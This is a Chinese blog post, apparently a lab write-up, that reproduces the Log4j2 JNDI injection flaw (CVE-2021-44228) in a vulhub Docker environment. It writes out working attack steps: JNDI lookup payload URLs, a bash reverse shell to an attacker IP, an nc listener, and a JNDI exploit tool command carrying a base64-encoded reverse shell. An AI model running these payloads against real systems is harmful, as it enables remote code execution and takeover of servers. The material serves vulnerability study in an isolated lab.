[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)

最新推荐文章于 2024-09-08 14:30:04 发布
最新推荐文章于 2024-09-08 14:30:04 发布
阅读量431 收藏 3
点赞数 3
分类专栏: 漏洞复现学习积累 文章标签: log4j 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441024/article/details/137784942
版权
本文详细描述了ApacheLog4j2中的CVE-2021-44228漏洞利用过程,包括如何通过JNDI注入执行任意代码,以及在靶机和攻击机之间进行的docker环境配置和漏洞利用工具的使用,展示了漏洞的渗透成功案例。
摘要由CSDN通过智能技术生成

CVE-2021-44228漏洞复现

漏洞简介

Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。

漏洞复现

靶机:192.168.74.150
攻击机:192.168.74.148

启动docker

在这里插入图片描述

docker-compose

在这里插入图片描述

docker ps

查看docker所在进程,如图所示
在这里插入图片描述
在kali火狐浏览器中打开,显示此界面为成功

在这里插入图片描述
获得一个临时的DNS这里是网站
在这里插入图片描述

在浏览器中输入 http://192.168.74.150:5005/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.armp2a.dnslog.cn}

在这里插入图片描述
如图,成功回显java版本号
在这里插入图片描述

在攻击机中下载注入工具 git clone https://github.com/bkfish/Apache-Log4j-Learning.git

在这里插入图片描述

bash -i >& /dev/tcp/192.168.74.148/19999 0>&1

在这里插入图片描述

在攻击机上开启端口监听 nc -lvvp 19999

在这里插入图片描述

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc0LjE0OC8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.74.148"
#直接运行并在攻击机中开启监听

在这里插入图片描述

http://192.168.74.150:8983/solr/admin/cores?action=${jndi:ldap://192.168.74.148:1389/jas9lj}

随机选择一个直接使用即可

在这里插入图片描述
如图即表示渗透成功!

养成好习惯,用完记得关闭:docker-compose down

待完善…

三哥sange
关注
专栏目录
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 2071
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 687
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
vulhub log4j2 CVE-2021-44228漏洞复现
最新发布
qq_65852138的博客
09-08 198
vulhub log4j2 CVE-2021-44228漏洞复现
vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
m0_62670778的博客
04-27 741
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
vulhubLog4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2997
vulhubLog4j2CVE-2021-44228漏洞复现
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 1977
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3212
Log4j-CVE-2021-44228漏洞复现
复现log4j2漏洞CVE-2021-44228
qq_58000413的博客
09-13 945
接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}cd vulhub/log4j/CVE-2021-44228 进入目录里。docker-compoes up -d 开启环境。docker-compoes ps 查看对应的端口。可以看到端口在8983上,我们到服务器防火墙打开8983。出现java版本,则存在命令执行漏洞
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
CVE-2021-44228 Log4j2 远程代码执行漏洞
震山的博客
08-23 756
简单分析,扯不上深度,还望大佬指正
Log4j CVE-2021-44228后续-CVE-2021-45046,CVE-2021-45105
oscar999的专栏
12-20 1176
Log4j 发现远程代码攻击漏洞CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4j 在Java 8的**安全版本是2.17.0 **。
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6102
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2CVE-2021-44228漏洞复现
oiadkt的博客
04-10 517
Log4j2CVE-2021-44228漏洞复现
vulhub漏洞复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2317
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 256
log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解vulhub环境
qq_46145027的博客
05-10 3820
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现流程
Log4j2漏洞复现CVE-2021-44228
鹿鸣天涯
01-13 654
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
08-22
Apache Log4j2是一个广泛使用的日志框架,用于Java应用程序的日志记录。CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以构造恶意的控制字符序列,使得日志处理器执行任意的Java代码,从而实现了远程代码执行。 攻击者可以通过受影响的应用程序访问的日志系统接口,将恶意脚本插入到日志消息中。如果应用服务器配置不当,比如默认开启了对用户提交日志的解析功能,就可能导致这种漏洞被利用,攻击者可以窃取敏感信息,甚至完全控制受影响的系统。 修复此漏洞通常需要更新到最新的Log4j2版本,并确保适当的安全配置,例如禁用不受信任的特性或者关闭日志处理器的功能。同时,也应该检查并修复所有可能受到漏洞影响的服务和组件。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值